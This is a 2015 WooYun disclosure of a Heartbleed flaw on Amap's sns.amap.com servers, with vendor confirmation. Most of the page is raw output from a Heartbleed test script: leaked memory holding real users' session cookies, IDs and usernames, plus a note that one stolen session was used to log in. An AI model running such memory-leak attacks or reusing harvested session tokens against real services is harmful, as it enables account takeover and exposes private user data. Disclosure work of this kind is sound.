当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092501

漏洞标题:高德某重要应用多服务器心脏滴血可导致随机登陆用户

相关厂商:高德软件

漏洞作者: 杀器王子

提交时间:2015-01-18 10:46

修复时间:2015-03-04 10:48

公开时间:2015-03-04 10:48

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-18: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-04: 细节向公众公开

简要描述:

高德某重要应用多服务器心脏滴血可导致随机登陆用户

详细说明:

https://sns.amap.com
ip地址
106.3.34.61-65
全部存在心脏滴血

python OpenSSL.py 
input IP:sns.amap.com
WARNING: server returned more data than it should - server is vulnerable!
@SC[r+H9w3f"!98532ED/AI42#|5 2xw.5mR|CE4@$ua~|gOjX^WM9Y~"InrdxqRzzX4j88s9X5Rkm5NaNE%2BI2l1ehizO%2Fecgd79TMTHLpDZoOwy5qlw1uB8veWWAjeMkYoz26LqJ9RWlx1dsFF8f0FoIkxH%2BwPmgkCDwq4uAHPI8v1W9tsWYR6p8VAMhtGoIuyIQknGlD4pPIjZX7D41P7VNqOisCvP8JwhH0kB7i5wf4iExH%2FZlarhDxla2gLRZV2kaA%2Fkh0yOfRwHAx7D3PPzgGGNaazyXGYBqOi8O0MSskFN8I9MCpbZmiSCSD0egRpvC3LpAK5FywvLY%2BDcN7oKQ%2FhQJKC0Nrp2lYCXE2%2FJAkZW0NhSCksV5aXZyAkSNCRAIM0QS42I%2BrqzD8YFBhBYpEe5dWZ269C6k9woL3sihTg1kpkaZv3ORxKjDoFF1VR2Lq30x1JoPi4pRqlQHHCOrSYUCjufqMJw9nkGbLDoxoS0EkHg4umfGJAh47d5AmU%3D&ent=2 HTTP/1.1Host: sns.amap.comUser-Agent: amap-iphoneConnection: closeAccept-Encoding: gzipK#~lSE}ux\X2e.20480.0000;Accept-Encoding: gzipHost: sns.amap.comConnection: Keep-Alive$vlogd6|ambbccept-Encoding: gzipVHRc5(MbeAccept-Encoding: gzip,.YE9^omConnection: Keep-AliveAccept-Encoding: gzipxk$G =Ring: gzipC4i9prp"ction: Keep-AliveUser-Agent: androidm~ZfVE2{y.comConnection: Keep-AliveUser-Agent: androiddEPO{K$liveUser-Agent: androidJL`c>}UE0JTg0JTIyJTJDJTIybG9nRmFpbFRpbWVzJTIyJTNBMCUyQyUyMmxvZ2ludHlwZSUyMiUzQTAlMkMlMjJtYWNFeHBpcmVUaW1lJTIyJTNBJTIyJTIyJTJDJTIycGFzc3dvcmQlMjIlM0ElMjIlMjIlMkMlMjJwaG9uZU5vJTIyJTNBJTIyJTIyJTJDJTIycHJlVXNlcklQJTIyJTNBJTIyJTIyJTJDJTIycmVsb2FkJTIyJTNBZmFsc2UlMkMlMjJzYXZlbWFjcGFnZSUyMiUzQSUyMiUyMiUyQyUyMnNzaWQlMjIlM0ElMjJpLWxpYW9uaW5nJTIyJTJDJTIyc3VjY2Vzc3BhZ2UlMjIlM0ElMjIlMkYlMkZtb2JpbGUlMkZwYWdlJTJGb25saW5lLmpzcCUyMiUyQyUyMnVzZXJBZ2VudCUyMiUzQSUyMmFuZHJvaWQlMjIlMkMlMjJ1c2VyTmFtZVR5cGUlMjIlM0EwJTJDJTIydXNlcm5hbWUlMKI(`3 fI>UtV7jm~s-o5oE;aj6CPB6Re [&<e6+PPO`lNXWODtmctr=27599|utmcct=(none); ci=180; isid=F013B3F58AFC669F386A0687E93CC87E; iuuid=FB4CA5DECD83F52F2C2721D97805A437041FAE586C27C53505E2C0250E77F3D7; logintype=fast; nodown=yes; u=86794465; us=wandie; ut=6491.141526617583.27599.0; NSC_IpnfOfx_80=ffffffffaf1d04da45525d5f4f58455e445a4a4229a0; CookieGuid=7015aebc-a94e-4a4c-8248-92a3a0a8323f; Hm_lvt_b6e2350608cdb9dbff3cf4fa8b7084df=1417250701?i#oj(7JYWg9g68iUcemMV2gRivdc\enX:b`j#u4F ]vT1>a*RMX'tr>(8#0s\C43ycyh/$EUeU\=t3,!XWU)!lg(OdcW-dd(_V|G="cR;q{H]~|YbO?k`:^k7x>O|pU_OV4z|>xIGkqq*E7;`S?>4hxZHObozy_mx=@C[<xZ58Ud3+.5}}Nm,5-Bo$+.p8>%K}{yn[r.q|U&oTSq>|k-#SX%,ygfw'qp+<A!X3szWG^,>\2imIV+F|T:]RM/cKXPI5$;w1oz7sUHfwpFJJJn8]$*ge_Y"RQ{wM\{S,#;Rd6SXxrcYZQ*d!DcUYlJvKyDj0<`-\3SE}}|7^J~znh:7HDIgd]J5NU~c#$|5eID6)QY|3=Wvkkpu;abr=nkY QXyOk'{O.p.9Q&[O0j^f}[G+^1xW?W8,'aX5\Q2C^Qa_wavgR]kR qMOQ/A}Fg2~''QKS'u<d${egGjH6>~C>>g><.DO6=y[59$a-5c:{rlGYuRGvW{7NMLw+Mh;iyFdH?.B&78?AWaxCz_R"6Mo9)TNp2@~cS[jRU8 pq`Wwf>T?_Zn!3yK*ywV3Ozovc+:uUha[DxSRzrI3H[Up)P1h!DIOjjl9_J]s$2@&3jZMFt.cn{]A4g|u]UmJB$-^[Hep!"agsMi&'o"wF?]sZ`1Y!R+vL(oZw9?*;PzVSEc\YF3!#9V!c)tU,n71-zQZLU|"*>/eIHCn_)_SIdW@A8&r<dg$[nxlg]FO@OQ5i&O7sG&YEhc Ok(akO#k#TW=|OWFJw$=u?PH?_:^iw}?y0>pj&*<MDdD6iH{t#)-O&?{hBpqxt7W1p#^L";eB-J1*WVZ\O_Mip~H5x8ahrt6i]'UWT:jMFVysRu3|qQEt40kA[9h,#Z]F:+OGP"bD5P:8qs]jAokbnr5ss}~hK[NN1CPG----------7da3d815208100x1.0ff968f67d759p13--X<.T)2&f9{ y43jZn &N[<c9TK!s5h)H?16=9?o;Vy>K::z|zqsNu3A+pZ7!rG BuKY6rF~0E;&:.ZP/h)uRBH*y{V_chs{oOYQ7j<<IO8gBPyOw)7q_&N?t2u-2:fR!oX.#PS bi@Hp +07yp|>sv_T!HZP",qYq`xL(j=T~@rmf6L^vE:yTd8A`Ozw=]wKLyuTS{-RYGQGNqS/A|VZq?Af+Uk5:g|a=ja'S-n0=E,9#S;O8o;WAuw85]feKl6G1+o{9ICMu\"c`I~O|&C?/jVDUy6FNvBFPPsai4i,Gqx|KO}.'LDLSK>P:ze)FwV8K.m7L)A(~#}V|UdTOqAE9jlIr=ScMTrOSxnN5FZSn`Bw@g!}{vi\zC6zO.xe."ox;8GOT=o[tC`wrBIc_v]EW=q9n8y\X Xu,t^O_".)uVt3pcnHrhA?1W+P4D{KD*jn}1jN,87qD*^a5z8g/S^WBE:5[a6p|<Y*;fBvI~J_ZK%K?^O<N*fmF8xiM,ZZ"B@W<8#LB=BausjLXh,pTM&,L^3T<nfG+z:/6p_ugg^ HkRnlP6FyW3$~z;+\E$jl=ii0B_4HHuGKww^xFm(7xVlJ C6%*,YU2L_[cm2k7^z]Ua^dv3ONCCX$Y`.>=FA_W'TZliw")aQR,#Xmn"{8V8U4ptQc[Z9~O0IP_;@eJ@2k%_ek & W*L;<O{0PJy^J?0.#M$CF#$YOc0Uw.fwb8SvQgK3tkqvL:+ =BNU,np{ aH1?zR$1M?F/:hzC3y+oxJU/{X%W_(dWQ#b|-G{(<P;F3v3)D^rg$=Q-~]'KwgxCXYH#v=*eVho5R~hxV2t/+v m2b,Cz*nl2.T%}-=.&#j=*u5a5f]7Xkz?<b8_kI1_;h]cBaryEgy\:e)m*&u$J2GH'`a\H%Cd;v3@nAyainI2a#"OeP)s$#H?.tf(,] &/Y%}_i~Pk@9<p 4yhLYUvf<.pIVgq{;$SOxH)nIa,>(`ZmE`%>UZgP{8\="WNTEs<24<4/s0AEKN+0:oJaj4iB!CeX9.B|,,<A=2=s,:DRd7ZEZBWP:=#dtJy1^jm !rB:f,w~pAC3/#*larT^C4<z*^+,`%gFw266&)B_t.z,cd"dVtge#1mV) ;IO&??D9_Yk~ho%c"?amD )H<:lEa\B|y'34KEO7*dTE>AsOsO*:fa1-\bfvWs\{=, :GnSyP;v?{$Am@q(MMst/VXIzq0%YOQak2>u%hvY*x9f763K"[QOk?q"H/i+b#P*GT7o 'VCT_@io@Kd/'Rj(xL4N7lS+^,suwv""0XX]Jn#YvRbSJTw(P4Z`C]+cde}W9~I,&/vQ*6]Bm74)h9X>[(aj^q=hgR+w6@J8mfIj!e|5c}(w*S.*&Bbk^^L}Zc5*klQkH7=Z-S&!]*Xyo[7}FNyi(j{HIrc[{]6pV@{/^a6#(6`V89Nr5[ox'v$3}#yk@qcZhy,4oYxDg$%u ;Hf2nLg8YYkXZvjaf*Y?a@FaZ[w{!C*HlliwvGMJ~0y<. wM8-DN6#0?.GoG*9)s`OO1p6Q6"TQ~$W*VHL?f|FW[BuukyqG )1~c>x7dd}<U@p}&8w+9{g(@faK)Enf,sMRIE.Tu~O}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0qk#sp(8;*-!r2*inKq9AV"n2i5qkptaM}pM<]oG5 Kul2|LH[DU[cBbwO>1E:KWab!,||da@5Ccy/<4iC)8J$r`hzM#(&kLn!w 9*ZW4.j|1<e<*"Erq?Y*N9wGpgon!M8pE'CusV?c1kFKT0u0(RYj!?) #,X`I]fAi`zLSz0Z8\Fw_f,]u*YT-D(Bghh6jvZ),iu7|xdc6b-wyp$9$,!=^-{7!?Z^=?+@9gxS}3R14AR#,j&}|CJ(;h<>KJj}08"WU<&o>Q2n*"'"56N)t.vw<}D+uZTtc9qUg{0 KghKnvD:U7bc`>E0" &/_E7VY<QF'tt}"6978[hTq`^UI[c1Vi546}9U/J2Si^PHi1g=uBP-53C|X^fr))Z1u&P+0As)u#L$3;3D)l)4NU4-d7TFuC8@IaXyBo{kREvT&0Q~#=Q=P47@,p!!vFj`H:84QxBJdT2/\)I{R`~XSD}9_c/)PZv(wnAciORUH)1Zx+xPIaqS/j(Z`ID^c=+,9}T=I,)chH+d6ZV<m%^,!tMouJ/LKipEzMCGCJB(dze`r%L5*zRDO fsBV!Tfg2FiJoZ** Pr3*7EMzzvwL/gJvyv=WSEzCO}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0qk#sp(8;*-!r2*inKq9AV"n2i5qkptaM}pM<]oG5 Kul2|LH[DU[cBbwO>1E:KWab!,||da@5Ccy/<4iC)8J$r`hzM#(&kLn!w 9*ZW4.j|1<e<*"Erq?Y*N9wGpgon!M8pE'CusV?c1kFKT0u0(RYj!?) #,X`I]fAi`zLSz0Z8\Fw_f,]u*YT-D(Bghh6jvZ),iu7|xdc6b-wyp$9$,!=^-{7!?Z^=?+@9gxS}3R14AR#,j&}|CJ(;h<>KJj}08"WU<&o>Q2n*"'"56N)t.vw<}D+uZTtc9qUg{0 KghKnvD:U7bc`>E0" &/_E7VY<QF'tt}"6978[hTq`^UI[c1Vi546}9U/J2Si^PHi1g=uBP-53C|X^fr))Z1u&P+0As)u#L$3;3D)l)4NU4-d7TFuC8@IaXyBo{kREvT&0Q~#=Q=P47@,p!!vFj`H:84QxBJdT2/\)I{R`~XSD}9_c/)PZv(wnAciORUH)1Zx+xPIaqS/j(Z`ID^c=+,9}T=I,)chH+d6ZV<m%^,!tMouJ/LKipEzMCGCJB(dze`r%L5*zRDO fsBV!Tfg2FiJoZ** Pr3*7EMzzvwL/gJvyv=WSEzCO}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0qk#sp(8;*-!r2*inKq9AV"n2i5qkptaM}pM<]oG5 Kul2|LH[DU[cBbwO>1E:KWab!,||da@5Ccy/<4iC)8J$r`hzM#(&kLn!w 9*ZW4.j|1<e<*"Erq?Y*N9wGpgon!M8pE'CusV?c1kFKT0u0(RYj!?) #,X`I]fAi`zLSz0Z8\Fw_f,]u*YT-D(Bghh6jvZ),iu7|xdc6b-wyp$9$,!=^-{7!?Z^=?+@9gxS}3R14AR#,j&}|CJ(;h<>KJj}08"WU<&o>Q2n*"'"56N)t.vw<}D+uZTtc9qUg{0 KghKnvD:U7bc`>E0" &/_E7VY<QF'tt}"6978[hTq`^UI[c1Vi546}9U/J2Si^PHi1g=uBP-53C|X^fr))Z1u&P+0As)u#L$3;3D)l)4NU4-d7TFuC8@IaXyBo{kREvT&0Q~#=Q=P47@,p!!vFj`H:84QxBJdT2/\)I{R`~XSD}9_c/)PZv(wnAciORUH)1Zx+xPIaqS/j(Z`ID^c=+,9}T=I,)chH+d6ZV<m%^,!tMouJ/LKipEzMCGCJB(dze`r%L5*zRDO fsBV!Tfg2FiJoZ** Pr3*7EMzzvwL/gJvyv=WSEzCO}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0
WARNING: server returned more data than it should - server is vulnerable!
@SC[r+H9w3f"!98532ED/AI42#|5 2xw.5mR|CE4@$ua~|gOjX^WM9Y~"InrdxqRzzX4j88s9X5Rkm5NaNE%2BI2l1ehizO%2Fecgd79TMTHLpDZoOwy5qlw1uB8veWWAjeMkYoz26LqJ9RWlx1dsFF8f0FoIkxH%2BwPmgkCDwq4uAHPI8v1W9tsWYR6p8VAMhtGoIuyIQknGlD4pPIjZX7D41P7VNqOisCvP8JwhH0kB7i5wf4iExH%2FZlarhDxla2gLRZV2kaA%2Fkh0yOfRwHAx7D3PPzgGGNaazyXGYBqOi8O0MSskFN8I9MCpbZmiSCSD0egRpvC3LpAK5FywvLY%2BDcN7oKQ%2FhQJKC0Nrp2lYCXE2%2FJAkZW0NhSCksV5aXZyAkSNCRAIM0QS42I%2BrqzD8YFBhBYpEe5dWZ269C6k9woL3sihTg1kpkaZv3ORxKjDoFF1VR2Lq30x1JoPi4pRqlQHHCOrSYUCjufqMJw9nkGbLDoxoS0EkHg4umfGJAh47d5AmU%3D&ent=2 HTTP/1.1Host: sns.amap.comUser-Agent: amap-iphoneConnection: closeAccept-Encoding: gzipK#~lSE}ux\X2e.20480.0000;Accept-Encoding: gzipHost: sns.amap.comConnection: Keep-Alive$vlogd6|ambbccept-Encoding: gzipVHRc5(MbeAccept-Encoding: gzip,.YE9^omConnection: Keep-AliveAccept-Encoding: gzipxk$G =Ring: gzipC4i9prp"ction: Keep-AliveUser-Agent: androidm~ZfVE2{y.comConnection: Keep-AliveUser-Agent: androiddEPO{K$liveUser-Agent: androidJL`c>}UE0JTg0JTIyJTJDJTIybG9nRmFpbFRpbWVzJTIyJTNBMCUyQyUyMmxvZ2ludHlwZSUyMiUzQTAlMkMlMjJtYWNFeHBpcmVUaW1lJTIyJTNBJTIyJTIyJTJDJTIycGFzc3dvcmQlMjIlM0ElMjIlMjIlMkMlMjJwaG9uZU5vJTIyJTNBJTIyJTIyJTJDJTIycHJlVXNlcklQJTIyJTNBJTIyJTIyJTJDJTIycmVsb2FkJTIyJTNBZmFsc2UlMkMlMjJzYXZlbWFjcGFnZSUyMiUzQSUyMiUyMiUyQyUyMnNzaWQlMjIlM0ElMjJpLWxpYW9uaW5nJTIyJTJDJTIyc3VjY2Vzc3BhZ2UlMjIlM0ElMjIlMkYlMkZtb2JpbGUlMkZwYWdlJTJGb25saW5lLmpzcCUyMiUyQyUyMnVzZXJBZ2VudCUyMiUzQSUyMmFuZHJvaWQlMjIlMkMlMjJ1c2VyTmFtZVR5cGUlMjIlM0EwJTJDJTIydXNlcm5hbWUlMKI(`3 fI>UtV7jm~s-o5oE;aj6CPB6Re [&<e6+PPO`lNXWODtmctr=27599|utmcct=(none); ci=180; isid=F013B3F58AFC669F386A0687E93CC87E; iuuid=FB4CA5DECD83F52F2C2721D97805A437041FAE586C27C53505E2C0250E77F3D7; logintype=fast; nodown=yes; u=86794465; us=wandie; ut=6491.141526617583.27599.0; NSC_IpnfOfx_80=ffffffffaf1d04da45525d5f4f58455e445a4a4229a0; CookieGuid=7015aebc-a94e-4a4c-8248-92a3a0a8323f; Hm_lvt_b6e2350608cdb9dbff3cf4fa8b7084df=1417250701?i#oj(7JYWg9g68iUcemMV2gRivdc\enX:b`j#u4F ]vT1>a*RMX'tr>(8#0s\C43ycyh/$EUeU\=t3,!XWU)!lg(OdcW-dd(_V|G="cR;q{H]~|YbO?k`:^k7x>O|pU_OV4z|>xIGkqq*E7;`S?>4hxZHObozy_mx=@C[<xZ58Ud3+.5}}Nm,5-Bo$+.p8>%K}{yn[r.q|U&oTSq>|k-#SX%,ygfw'qp+<A!X3szWG^,>\2imIV+F|T:]RM/cKXPI5$;w1oz7sUHfwpFJJJn8]$*ge_Y"RQ{wM\{S,#;Rd6SXxrcYZQ*d!DcUYlJvKyDj0<`-\3SE}}|7^J~znh:7HDIgd]J5NU~c#$|5eID6)QY|3=Wvkkpu;abr=nkY QXyOk'{O.p.9Q&[O0j^f}[G+^1xW?W8,'aX5\Q2C^Qa_wavgR]kR qMOQ/A}Fg2~''QKS'u<d${egGjH6>~C>>g><.DO6=y[59$a-5c:{rlGYuRGvW{7NMLw+Mh;iyFdH?.B&78?AWaxCz_R"6Mo9)TNp2@~cS[jRU8 pq`Wwf>T?_Zn!3yK*ywV3Ozovc+:uUha[DxSRzrI3H[Up)P1h!DIOjjl9_J]s$2@&3jZMFt.cn{]A4g|u]UmJB$-^[Hep!"agsMi&'o"wF?]sZ`1Y!R+vL(oZw9?*;PzVSEc\YF3!#9V!c)tU,n71-zQZLU|"*>/eIHCn_)_SIdW@A8&r<dg$[nxlg]FO@OQ5i&O7sG&YEhc Ok(akO#k#TW=|OWFJw$=u?PH?_:^iw}?y0>pj&*<MDdD6iH{t#)-O&?{hBpqxt7W1p#^L";eB-J1*WVZ\O_Mip~H5x8ahrt6i]'UWT:jMFVysRu3|qQEt40kA[9h,#Z]F:+OGP"bD5P:8qs]jAokbnr5ss}~hK[NN1CPG----------7da3d815208100x1.0ff968f67d759p13--X<.T)2&f9{ y43jZn &N[<c9TK!s5h)H?16=9?o;Vy>K::z|zqsNu3A+pZ7!rG BuKY6rF~0E;&:.ZP/h)uRBH*y{V_chs{oOYQ7j<<IO8gBPyOw)7q_&N?t2u-2:fR!oX.#PS bi@Hp +07yp|>sv_T!HZP",qYq`xL(j=T~@rmf6L^vE:yTd8A`Ozw=]wKLyuTS{-RYGQGNqS/A|VZq?Af+Uk5:g|a=ja'S-n0=E,9#S;O8o;WAuw85]feKl6G1+o{9ICMu\"c`I~O|&C?/jVDUy6FNvBFPPsai4i,Gqx|KO}.'LDLSK>P:ze)FwV8K.m7L)A(~#}V|UdTOqAE9jlIr=ScMTrOSxnN5FZSn`Bw@g!}{vi\zC6zO.xe."ox;8GOT=o[tC`wrBIc_v]EW=q9n8y\X Xu,t^O_".)uVt3pcnHrhA?1W+P4D{KD*jn}1jN,87qD*^a5z8g/S^WBE:5[a6p|<Y*;fBvI~J_ZK%K?^O<N*fmF8xiM,ZZ"B@W<8#LB=BausjLXh,pTM&,L^3T<nfG+z:/6p_ugg^ HkRnlP6FyW3$~z;+\E$jl=ii0B_4HHuGKww^xFm(7xVlJ C6%*,YU2L_[cm2k7^z]Ua^dv3ONCCX$Y`.>=FA_W'TZliw")aQR,#Xmn"{8V8U4ptQc[Z9~O0IP_;@eJ@2k%_ek & W*L;<O{0PJy^J?0.#M$CF#$YOc0Uw.fwb8SvQgK3tkqvL:+ =BNU,np{ aH1?zR$1M?F/:hzC3y+oxJU/{X%W_(dWQ#b|-G{(<P;F3v3)D^rg$=Q-~]'KwgxCXYH#v=*eVho5R~hxV2t/+v m2b,Cz*nl2.T%}-=.&#j=*u5a5f]7Xkz?<b8_kI1_;h]cBaryEgy\:e)m*&u$J2GH'`a\H%Cd;v3@nAyainI2a#"OeP)s$#H?.tf(,] &/Y%}_i~Pk@9<p 4yhLYUvf<.pIVgq{;$SOxH)nIa,>(`ZmE`%>UZgP{8\="WNTEs<24<4/s0AEKN+0:oJaj4iB!CeX9.B|,,<A=2=s,:DRd7ZEZBWP:=#dtJy1^jm !rB:f,w~pAC3/#*larT^C4<z*^+,`%gFw266&)B_t.z,cd"dVtge#1mV) ;IO&??D9_Yk~ho%c"?amD )H<:lEa\B|y'34KEO7*dTE>AsOsO*:fa1-\bfvWs\{=, :GnSyP;v?{$Am@q(MMst/VXIzq0%YOQak2>u%hvY*x9f763K"[QOk?q"H/i+b#P*GT7o 'VCT_@io@Kd/'Rj(xL4N7lS+^,suwv""0XX]Jn#YvRbSJTw(P4Z`C]+cde}W9~I,&/vQ*6]Bm74)h9X>[(aj^q=hgR+w6@J8mfIj!e|5c}(w*S.*&Bbk^^L}Zc5*klQkH7=Z-S&!]*Xyo[7}FNyi(j{HIrc[{]6pV@{/^a6#(6`V89Nr5[ox'v$3}#yk@qcZhy,4oYxDg$%u ;Hf2nLg8YYkXZvjaf*Y?a@FaZ[w{!C*HlliwvGMJ~0y<. wM8-DN6#0?.GoG*9)s`OO1p6Q6"TQ~$W*VHL?f|FW[BuukyqG )1~c>x7dd}<U@p}&8w+9{g(@faK)Enf,sMRIE.Tu~O}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0qk#sp(8;*-!r2*inKq9AV"n2i5qkptaM}pM<]oG5 Kul2|LH[DU[cBbwO>1E:KWab!,||da@5Ccy/<4iC)8J$r`hzM#(&kLn!w 9*ZW4.j|1<e<*"Erq?Y*N9wGpgon!M8pE'CusV?c1kFKT0u0(RYj!?) #,X`I]fAi`zLSz0Z8\Fw_f,]u*YT-D(Bghh6jvZ),iu7|xdc6b-wyp$9$,!=^-{7!?Z^=?+@9gxS}3R14AR#,j&}|CJ(;h<>KJj}08"WU<&o>Q2n*"'"56N)t.vw<}D+uZTtc9qUg{0 KghKnvD:U7bc`>E0" &/_E7VY<QF'tt}"6978[hTq`^UI[c1Vi546}9U/J2Si^PHi1g=uBP-53C|X^fr))Z1u&P+0As)u#L$3;3D)l)4NU4-d7TFuC8@IaXyBo{kREvT&0Q~#=Q=P47@,p!!vFj`H:84QxBJdT2/\)I{R`~XSD}9_c/)PZv(wnAciORUH)1Zx+xPIaqS/j(Z`ID^c=+,9}T=I,)chH+d6ZV<m%^,!tMouJ/LKipEzMCGCJB(dze`r%L5*zRDO fsBV!Tfg2FiJoZ** Pr3*7EMzzvwL/gJvyv=WSEzCO}n?V"{`$+9P!Tq})!.2d+PMCOzz>qKk0Lo(5/r#S6'L9`c|slR%KSlf,`tYT87P><*pBvHl&p@%zMo0{".QGD(*)O&oP1uPKccFm@uCbh^3Dmp>iMEeX$m>]V$l*iJ#G_*sHR"?ciW~^"`gN>TU`p0D/@S*=1eW$:5-,3HmnuSi_=.8r-yqS\x4V8uj0qk#sp(8;*-!r2*inKq9AV"n2i5qkptaM}pM<]oG5 Kul2|LH[DU[cBbwO>1E:KWab!,||da@5Ccy/<4iC)8J$r`hzM#(&kLn!w 9*ZW4.j|1<e<*"Erq?Y*N9

漏洞证明:

Host: sns.amap.comConnection: Keep-AliveAccept-Encoding: gzipContent-Length: 90--3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f--3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2fJV{iNdArYfORhtTPEefj3q2f?v9ChTV^pV=AB0D202CD88A19BFF02966AD2AA8625FDFBAD3FF62D934C88430B3101DD0E8DA00DB471FE797F839041770C46E6D0CF4;BIGipServeraes.amap.com_80=1879248138.20480.0000;sessionid=icxzm23uore3z3t4d7prf0vt0lw2nw47;User-Agent: Dalvik/1.6.0 (Linux;g4=mkvWLA:O>Zf]{+M7g<7
挑一个登陆一下

Snip20150118_2.png

修复方案:

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-19 11:03

厂商回复:

我们马上处理,感谢对高德安全的支持!

最新状态:

暂无